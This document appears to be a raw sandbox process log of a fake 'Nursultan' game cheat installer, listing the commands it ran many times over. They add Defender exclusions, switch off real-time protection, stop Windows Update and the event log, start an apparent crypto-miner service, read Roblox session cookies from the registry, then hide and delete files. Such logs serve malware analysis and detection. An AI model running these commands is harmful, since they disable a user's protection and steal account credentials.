"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

